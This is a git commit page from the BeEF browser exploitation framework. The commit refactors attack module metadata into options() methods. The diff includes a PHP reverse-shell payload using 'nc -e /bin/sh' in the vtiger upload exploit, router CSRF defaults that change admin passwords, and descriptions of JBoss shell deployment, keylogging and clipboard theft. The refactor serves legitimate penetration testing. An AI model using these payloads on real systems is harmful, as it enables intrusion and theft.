Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Removed all super() methods and moved all data into new options() method. Fixes issue 330

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1120 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
passbe
2011-07-28 01:36:24 +00:00
parent 5b4ff61909
commit 3455ebda87
38 changed files with 120 additions and 887 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
modules/browser/detect_details/module.rb
View File

@@ -15,26 +15,6 @@
#
class Detect_details < BeEF::Core::Command
def initialize
super({
'Name' => 'Browser Type',
'Description' => %Q{
This module will retrieve the selected zombie browser details.'
},
'Category' => 'Browser',
'Author' => ['wade','vo','passbe','saafan'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def callback
content = {}
content['Browser type'] = @datastore['browser_type']
@@ -43,4 +23,4 @@ class Detect_details < BeEF::Core::Command
#update_zombie!
end
end
end

22
modules/browser/detect_plugins/module.rb
View File

@@ -15,26 +15,6 @@
#
class Detect_plugins < BeEF::Core::Command
def initialize
super({
'Name' => 'Installed Plugins',
'Description' => %Q{
This module will retrieve the selected zombie browser plugins.'
},
'Category' => 'Browser',
'Author' => ['wade','vo','passbe','saafan'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def callback
content = {}
content['Plugins'] = @datastore['plugins']
@@ -43,4 +23,4 @@ class Detect_plugins < BeEF::Core::Command
#update_zombie!
end
end
end

22
modules/browser/detect_screen_details/module.rb
View File

@@ -15,26 +15,6 @@
#
class Detect_screen_details < BeEF::Core::Command
def initialize
super({
'Name' => 'Screen Details',
'Description' => %Q{
This module will retrieve the selected zombie screen dimensions.'
},
'Category' => 'Browser',
'Author' => ['wade','vo','passbe','saafan'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def callback
content = {}
content['Screen Parameters'] = @datastore['screen_params']
@@ -44,4 +24,4 @@ class Detect_screen_details < BeEF::Core::Command
#update_zombie!
end
end
end

22
modules/browser/detect_scripts_support/module.rb
View File

@@ -15,26 +15,6 @@
#
class Detect_scripts_support < BeEF::Core::Command
def initialize
super({
'Name' => 'Scripts Support',
'Description' => %Q{
This module will retrieve the selected zombie browser scripting engines.'
},
'Category' => 'Browser',
'Author' => ['wade','vo','passbe','saafan'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def callback
content = {}
content['Java enabled'] = @datastore['java_enabled']
@@ -46,4 +26,4 @@ class Detect_scripts_support < BeEF::Core::Command
#update_zombie!
end
end
end

24
modules/browser/detect_visited_urls/module.rb
View File

@@ -15,28 +15,14 @@
#
class Detect_visited_urls < BeEF::Core::Command
def initialize
super({
'Name' => 'Detect Visited URLs',
'Description' => 'This module will detect whether or not the zombie has visited the specifed URL(s) before.',
'Category' => 'Browser',
'Author' => ['passbe'],
'Data' => [
{ 'ui_label'=>'URL(s)', 'name'=>'urls', 'type'=>'textarea', 'value'=>'http://www.bindshell.net/', 'width'=>'200px' }
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
def self.options
return [
{ 'ui_label'=>'URL(s)', 'name'=>'urls', 'description' => 'Enter target URL(s)', 'type'=>'textarea', 'value'=>'http://www.bindshell.net/', 'width'=>'200px' }
]
end
def callback
save({'result' => @datastore['result']})
end
end
end

22
modules/browser/hook_ie/module.rb
View File

@@ -16,26 +16,6 @@
class Hook_ie < BeEF::Core::Command
def initialize
super({
'Name' => 'Hook IE',
'Description' => %Q{
This module will attempt to hook IE if it is the default browser.'
},
'Category' => 'Browser',
'Author' => ['saafan'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def pre_send
#Get the servers configurations.
configuration = BeEF::Core::Configuration.instance
@@ -75,4 +55,4 @@ class Hook_ie < BeEF::Core::Command
#update_zombie!
end
end
end

26
modules/browser/link_rewrite/module.rb
View File

@@ -15,29 +15,15 @@
#
class Link_rewrite < BeEF::Core::Command
def initialize
super({
'Name' => 'Link Rewriter',
'Description' => 'This module will rewrite the href attribute of all matched links.<br /><br />The jQuery selector field can be used to limit the selection of links. eg: a[href="http://www.bindshell.net"]. For more information please see: http://api.jquery.com/category/selectors/',
'Category' => 'Browser',
'Author' => ['passbe'],
'Data' => [
{ 'ui_label'=>'URL', 'name'=>'url', 'value'=>'http://www.bindshell.net/', 'width'=>'200px' },
{ 'ui_label'=>'jQuery Selector', 'name'=>'selector', 'value'=>'a', 'width'=>'200px' }
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
def self.options
return [
{ 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://www.bindshell.net/', 'width'=>'200px' },
{ 'ui_label'=>'jQuery Selector', 'name'=>'selector', 'description' => 'Optional link selector other than all a* tags', 'value'=>'a', 'width'=>'200px' }
]
end
def callback
save({'result' => @datastore['result']})
end
end
end

24
modules/browser/site_redirect/module.rb
View File

@@ -15,28 +15,14 @@
#
class Site_redirect < BeEF::Core::Command
def initialize
super({
'Name' => 'Site Redirect',
'Description' => 'This module will redirect the hooked browser to the address specified in the \'Redirect URL\' input.',
'Category' => 'Browser',
'Author' => ['wade', 'vo'],
'Data' => [
{ 'ui_label'=>'Redirect URL', 'name'=>'redirect_url', 'value'=>'http://www.bindshell.net/', 'width'=>'200px' }
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use_template!
def self.options
return [
{ 'ui_label'=>'Redirect URL', 'name'=>'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value'=>'http://www.bindshell.net/', 'width'=>'200px' }
]
end
def callback
save({'result' => @datastore['result']})
end
end
end

33
modules/browser/site_redirect_iframe/module.rb
View File

@@ -15,30 +15,13 @@
#
class Site_redirect_iframe < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Site Redirect (iFrame)',
'Description' => 'This module will redirect the hooked browser to the address specified in the \'Redirect URL\' input. It creates a 100% x 100% overlaying iframe to keep the victim hooked and changes the page title to the provided value which should be set to the title of the redirect URL.',
'Category' => 'Browser',
'Author' => ['ethicalhack3r, Yori Kvitchko'],
'Data' => [
{ 'name' => 'iframe_title', 'ui_label' => 'New Page Title', 'value' => 'BindShell.Net: Home', 'width'=>'200px' },
{ 'name' => 'iframe_src', 'ui_label' => 'Redirect URL', 'value' => 'http://www.bindshell.net/', 'width'=>'200px' },
{ 'name' => 'iframe_timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' }
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use_template!
end
def self.options
return [
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Page Title', 'value' => 'BindShell.Net: Home', 'width'=>'200px' },
{ 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://www.bindshell.net/', 'width'=>'200px' },
{ 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' }
]
end
# This method is being called when a hooked browser sends some
# data back to the framework.
@@ -47,4 +30,4 @@ class Site_redirect_iframe < BeEF::Core::Command
save({'result' => @datastore['result']})
end
end
end

23
modules/debug/test_return_ascii_chars/module.rb
View File

@@ -15,29 +15,6 @@
#
class Test_return_ascii_chars < BeEF::Core::Command
def initialize
super({
'Name' => 'Return Ascii Chars',
'Description' => %Q{
This module will return the set of ascii chars.
},
'Category' => 'Debug',
'Data' => [
# {'name' => 'repeat', 'ui_label' => 'Times to repeat', 'value' =>'1024'},
# {'name' => 'repeat_string', 'ui_label' => 'String to repeat', 'value' =>'\u00AE'}
],
'Author' => ['wade'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end
def callback
content = {}
content['Result String'] = @datastore['result_string']

29
modules/debug/test_return_long_string/module.rb
View File

@@ -15,28 +15,13 @@
#
class Test_return_long_string < BeEF::Core::Command
def initialize
super({
'Name' => 'Return Long String',
'Description' => %Q{
This module will return a string of the specified length.
},
'Category' => 'Debug',
'Data' => [
{'name' => 'repeat', 'ui_label' => 'Times to repeat', 'value' =>'1024'},
{'name' => 'repeat_string', 'ui_label' => 'String to repeat', 'value' =>'\u00AE'}
],
'Author' => ['wade'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end
def self.options
return [
{'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' =>'1024'},
{'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' =>'\u00AE'}
]
end
def callback
content = {}

43
modules/host/insecure_url_skype/module.rb
View File

@@ -15,45 +15,8 @@
#
class Insecure_url_skype < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Insecure URL Handling - Skype Call',
'Description' => 'This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes<br>
<br>
The protocol handler used will be: skype',
'Category' => 'Host',
'Author' => 'xntrik, Nitesh Dhanjani',
'Data' => [
{ 'name' => 'tel_num', 'ui_label'=>'Number', 'value' =>'5551234', 'width' => '200px' }
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => S
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => C
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => FF
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => O
})
use 'beef.dom'
use_template!
def self.options
{ 'name' => 'tel_num', 'description' => 'The telephone number to dial', 'ui_label'=>'Number', 'value' =>'5551234', 'width' => '200px' }
end
def callback
@@ -63,4 +26,4 @@ class Insecure_url_skype < BeEF::Core::Command
end
end
end

31
modules/host/iphone_tel/module.rb
View File

@@ -15,31 +15,10 @@
#
class Iphone_tel < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'iPhone Telephone URL',
'Description' => 'This module will force the browser to attempt a skype
call. It will exploit the insecure handling of URL schemes in iOS.<br>
<br>
The protocol handler used will be: tel',
'Category' => 'Host',
'Author' => 'xntrik, Nitesh Dhanjani',
'Data' => [
{ 'name' => 'tel_num', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' },
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => S
})
use 'beef.dom'
use_template!
def self.options
return [
{ 'name' => 'tel_num', 'description' => 'Telephone number', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' },
]
end
def callback
@@ -49,4 +28,4 @@ class Iphone_tel < BeEF::Core::Command
end
end
end

22
modules/host/physical_location/module.rb
View File

@@ -15,26 +15,6 @@
#
class Physical_location < BeEF::Core::Command
def initialize
super({
'Name' => 'Physical location',
'Description' => %Q{
This module will retrieve the physical location of the victim using the geolocation API
},
'Category' => 'Host',
'Author' => ['antisnatchor'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use 'beef.geolocation'
use_template!
end
def callback
content = {}
content['Geolocation Enabled'] = @datastore['geoLocEnabled']
@@ -44,4 +24,4 @@ class Physical_location < BeEF::Core::Command
save content
end
end
end

29
modules/metasploit/browser_autopwn/module.rb
View File

@@ -15,10 +15,7 @@
#
class Browser_autopwn < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
def self.options
@conf = BeEF::Core::Configuration.instance
@uri = 'Enter AutoPwn URL Here'
begin
@@ -28,26 +25,10 @@ class Browser_autopwn < BeEF::Core::Command
@uri = "http://#{host}:8080/#{url}"
end
end
super({
'Name' => 'Browser Autopwn',
'Description' => "This module will redirect a user to the autopwn port on a Metasploit listener and then rely on Metasploit to handle the resulting shells. If the Metasploit extension is loaded, this module will pre-populate the URL to the pre-launched listener. Otherwise, enter the URL you would like the user to be redirected to.",
'Category' => 'Metasploit',
'Author' => ['sussurro'],
'Data' => [
{ 'name' => 'sploit_url', 'ui_label' => 'Listener URL', 'value' => @uri, 'width'=>'200px' },
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
return [
{ 'name' => 'sploit_url', 'description' => 'The URL to exploit', 'ui_label' => 'Listener URL', 'value' => @uri, 'width'=>'200px' },
]
end
# This method is being called when a hooked browser sends some
# data back to the framework.

28
modules/misc/alert_dialog/module.rb
View File

@@ -15,41 +15,15 @@
#
class Alert_dialog < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Alert Dialog',
'Description' => 'Sends an alert dialog to the victim',
'Category' => 'Misc',
'Author' => 'bm',
'Data' => [
{'name' => 'text', 'ui_label'=>'Alert text', 'type' => 'textarea', 'value' =>'BeEF', 'width' => '400px', 'height' => '100px'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
# This tells the framework to use the file 'alert.js' as the command module instructions.
use_template!
end
# set and return all options for this module
def self.options
return [{
'name' => 'text',
'description' => 'Sends an alert dialog to the victim',
'filter' => '',
'type' => 'textarea',
'ui_label' => 'Alert text',
'value' => 'Alert box text',
'width' => '400px',
'height' => '100px'
'width' => '400px'
}]
end

29
modules/misc/clipboard_theft/module.rb
View File

@@ -15,35 +15,6 @@
#
class Clipboard_theft < BeEF::Core::Command
def initialize
super({
'Name' => 'Clipboard Theft',
'Description' => 'Retrieves the clipboard contents. This module will work automatically with Internet Explorer 6.x however Internet Explorer 7.x will prompt the user and ask for permission to access the clipboard.',
'Category' => 'Misc',
'Author' => 'bcoles',
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => IE,
'browser_max_ver' => "6",
'browser_min_ver' => "6"
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => IE,
'browser_max_ver' => "7",
'browser_min_ver' => "7"
})
set_target({
'verified_status' => VERIFIED_NOT_WORKING,
'browser_name' => ALL
})
use_template!
end
def callback
content = {}
content['clipboard'] = @datastore['clipboard']

28
modules/misc/deface_web_page/module.rb
View File

@@ -15,28 +15,10 @@
#
class Deface_web_page < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Deface Web Page',
'Description' => 'Overwrite the body of the page the victim is on with the "Deface Content" string',
'Category' => 'Misc',
'Author' => 'antisnatchor',
'Data' => [
{ 'name' => 'deface_content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'Defaced!', 'width' => '400px', 'height' => '100px' },
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
def self.options
return [
{ 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'Defaced!', 'width' => '400px', 'height' => '100px' }
]
end
def callback
@@ -46,4 +28,4 @@ class Deface_web_page < BeEF::Core::Command
end
end
end

30
modules/misc/extract_local_storage/module.rb
View File

@@ -15,40 +15,10 @@
#
class Extract_local_storage < BeEF::Core::Command
#
# Defines and set up the command module.
#
# More info:
# http://dev.w3.org/html5/webstorage/
# http://diveintohtml5.org/storage.html
#
def initialize
super({
'Name' => 'Extract Local Storage',
'Description' => 'Extracts data from the HTML5 localStorage object.',
'Category' => 'Misc',
'Author' => 'bcoles',
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => FF
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => S
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => C
})
use_template!
end
def callback
content = {}

24
modules/misc/prompt_dialog/module.rb
View File

@@ -15,24 +15,10 @@
#
class Prompt_dialog < BeEF::Core::Command
def initialize
super({
'Name' => 'Prompt Dialog',
'Description' => 'Sends a prompt dialog to the victim',
'Category' => 'Misc',
'Author' => 'bm',
'Data' => [
{'name' =>'question', 'ui_label'=>'Prompt text'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use_template!
def self.options
return [
{'name' =>'question', 'description' =>'Prompt text', 'ui_label'=>'Prompt text'}
]
end
#
@@ -46,4 +32,4 @@ class Prompt_dialog < BeEF::Core::Command
save({'answer' => @datastore['answer']})
end
end
end

31
modules/misc/raw_javascript/module.rb
View File

@@ -15,30 +15,11 @@
#
class Raw_javascript < BeEF::Core::Command
def initialize
super({
'Name' => 'Raw Javascript',
'Description' => %Q{
This module will send the code entered in the 'JavaScript Code' section to the selected
zombie browsers where it will be executed. Code is run inside an anonymous function and the return
value is passed to the framework. Multiline scripts are allowed, no special encoding is required.
},
'Category' => 'Misc',
'Author' => ['wade','vo'],
'Data' =>
[
{'name' => 'cmd', 'ui_label' => 'Javascript Code', 'value' => "alert(\'BeEF Raw Javascript\');\nreturn \'It worked!\';", 'type' => 'textarea', 'width' => '400px', 'height' => '100px'},
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
end
def self.options
return [
{'name' => 'cmd', 'description' => 'Javascript Code', 'ui_label' => 'Javascript Code', 'value' => "alert(\'BeEF Raw Javascript\');\nreturn \'It worked!\';", 'type' => 'textarea', 'width' => '400px', 'height' => '100px'},
]
end
#
# This method is being called when a zombie sends some
@@ -49,4 +30,4 @@ class Raw_javascript < BeEF::Core::Command
save({'result' => @datastore['result']})
end
end
end

33
modules/misc/replace_video/module.rb
View File

@@ -15,31 +15,12 @@
#
class Replace_video < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Replace Video',
'Description' => 'Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default).',
'Category' => 'Misc',
'Author' => ['Yori Kvitchko','antisnatchor'],
'Data' =>
[
{'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width'=>'150px'},
{'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def self.options
return [
{'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width'=>'150px'},
{'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
]
end
def callback
content = {}
@@ -48,4 +29,4 @@ class Replace_video < BeEF::Core::Command
end
end
end

26
modules/misc/rickroll/module.rb
View File

@@ -15,30 +15,6 @@
#
class Rickroll < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Rickroll',
'Description' => 'Overwrite the body of the page the victim is on with a full screen Rickroll.',
'Category' => 'Misc',
'Author' => 'Yori Kvitchko',
'Data' =>
[
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def callback
content = {}
content['Result'] = @datastore['result']
@@ -46,4 +22,4 @@ class Rickroll < BeEF::Core::Command
end
end
end

28
modules/network/coldfusion_dir_traversal_exploit/module.rb
View File

@@ -15,20 +15,8 @@
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'ColdFusion Directory Traversal Exploit',
'Description' => 'ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861). </br> For SOP limitations, the victim must be hooked to BeEF through a page served by the ColdFusion server.',
'Category' => 'Network',
'Author' => 'antisnatchor',
'Data' => [
# for Same Origin Policy limitations, right now we're only handling local ColdFusion servers
# (victim hooked on page malware.com/ciccio/pasticcio and CF server reachable at malware.com/CFIDE )
#{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
#{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
def self.options
return [
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
@@ -38,17 +26,7 @@ class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
]
end
def callback

28
modules/network/detect_local_settings/module.rb
View File

@@ -15,34 +15,6 @@
#
class Detect_local_settings < BeEF::Core::Command
def initialize
super({
'Name' => 'Detect local settings',
'Description' => 'Grab the local network settings (i.e internal ip address)',
'Category' => 'Network',
'Author' => ['pdp', 'wade', 'bm', 'xntrik'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => FF
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => C
})
set_target({
'verified_status' => VERIFIED_NOT_WORKING,
'browser_name' => IE
})
use 'beef.net.local'
use_template!
end
def pre_send
#Mount the Beeffeine.class on /Beeffeine.class
#Unsure if there's something we can add here to check if the module was already mounted?

23
modules/network/jboss_jmx_upload_exploit/module.rb
View File

@@ -15,16 +15,8 @@
#
class Jboss_jmx_upload_exploit < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Jboss 6.0.0M1 JMX Deploy Exploit',
'Description' => 'Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload.',
'Category' => 'Network',
'Author' => 'antisnatchor, l33tb0y',
'Data' => [
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
@@ -35,16 +27,7 @@ class Jboss_jmx_upload_exploit < BeEF::Core::Command
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
]
end
def callback

23
modules/network/linksys_befsr41_csrf/module.rb
View File

@@ -15,29 +15,12 @@
#
class Linksys_befsr41_csrf < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Linksys BEFSR41 CSRF Exploit',
'Description' => 'Attempts to enable remote administration and change the password on a Linksys BEFSR41 router.',
'Category' => 'Network',
'Author' => 'Martin Barbella',
'Data' => [
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
]
end
def callback

23
modules/network/linksys_wrt54g2_csrf/module.rb
View File

@@ -15,29 +15,12 @@
#
class Linksys_wrt54g2_csrf < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Linksys WRT54G2 CSRF Exploit',
'Description' => 'Attempts to enable remote administration and change the password on a Linksys WRT54G2 router.',
'Category' => 'Network',
'Author' => 'Martin Barbella',
'Data' => [
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
]
end
def callback

23
modules/network/linksys_wrt54g_csrf/module.rb
View File

@@ -15,29 +15,12 @@
#
class Linksys_wrt54g_csrf < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'Linksys WRT54G CSRF Exploit',
'Description' => 'Attempts to enable remote administration and change the password on a Linksys WRT54G router.',
'Category' => 'Network',
'Author' => 'Martin Barbella',
'Data' => [
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use_template!
]
end
def callback

36
modules/network/vtiger_crm_upload_exploit/module.rb
View File

@@ -15,7 +15,7 @@
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
def initialize
def self.options
time = Time.new
weekno = case time.day
when 1..7 then 1
@@ -27,32 +27,14 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
super({
'Name' => 'VTiger CRM Upload Exploit',
'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888. <br><br>vTigerCRM 5.0.4: Use extension "PHP" and php code.<br>vTigerCRM 5.2.0: Use extension "phtml" and php code.<br>vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.',
'Category' => 'Network',
'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'],
'Data' =>
[
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.net.local'
use_template!
return [
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
]
end
def callback

23
modules/persistence/iframe_above/module.rb
View File

@@ -15,27 +15,6 @@
#
class Iframe_above < BeEF::Core::Command
#
# Defines and set up the commmand module.
#
def initialize
super({
'Name' => 'iFrame Persistance',
'Description' => 'Rewrites all links on the webpage to spawn a 100% by 100% iFrame with a source relative to the selected link.',
'Category' => 'Persistence',
'Author' => 'passbe',
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use_template!
end
# This method is being called when a hooked browser sends some
# data back to the framework.
#
@@ -43,4 +22,4 @@ class Iframe_above < BeEF::Core::Command
save({'result' => @datastore['result']})
end
end
end

31
modules/persistence/iframe_keylogger/module.rb
View File

@@ -15,34 +15,11 @@
#
class Iframe_keylogger < BeEF::Core::Command
#
# Defines and set up the command module.
#
def initialize
super({
'Name' => 'iFrame keylogger',
'Description' => 'Creates a 100% by 100% iFrame overlay displaying the choosen resource, and add JS keylogging capabilities on that iFrame. Useful to grab same-domain login page credentials.',
'Category' => 'Misc',
'Author' => 'antisnatchor',
'Data' => [
def self.options
return [
